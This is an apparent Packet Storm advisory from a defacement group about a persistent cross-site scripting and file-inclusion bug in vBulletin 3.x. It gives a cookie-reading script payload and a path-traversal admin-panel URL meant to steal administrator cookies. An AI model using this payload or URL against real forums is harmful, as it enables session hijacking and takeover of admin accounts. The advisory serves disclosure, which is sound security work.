vBulletin version 3.x suffers from a persistent cross site scripting bug due to a file inclusion vulnerability.
124cb4ff6f114f48f07ed87a69cd0995d57142a60c8e9fdc60831d2609800e0d+--------------------------------------------------------------------
+
+ New Include Redirect Bug XSS All vBulletin® v 3.x.x
+
+--------------------------------------------------------------------
+ vendor site........: http://www.vbulletin.com/
+ Affected Software .: vbulletin
+ Class .............: XSS
+ Risk ..............: Low
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
New Include Redirect Bug XSS All vBulletin v 3.x.x
This injections would allow an attacker to Include Redirect Admin to a page of his choice, effectively
Xss the page and steal cookie :
xss permanent ( must be Upload any File on Site Have Xss code ) PoC :
<script>alert(document.cookie)</script>.
to be used with cookie stealer following is a simple attack :-
http://localhost/vb/admincp/index.php?loc=../../../nez.txt
When opened url Will stealing cookies
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT || + || BlackWHITE || - || dOcnok || - || A.tar0uDant.D ||
+ || Pro Hacker || - || DARKFIRE || - || papipsycho ||
+ Sp.Thanx To : Sec-Area.com Member's
+-------------------------[ W D T ]----------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed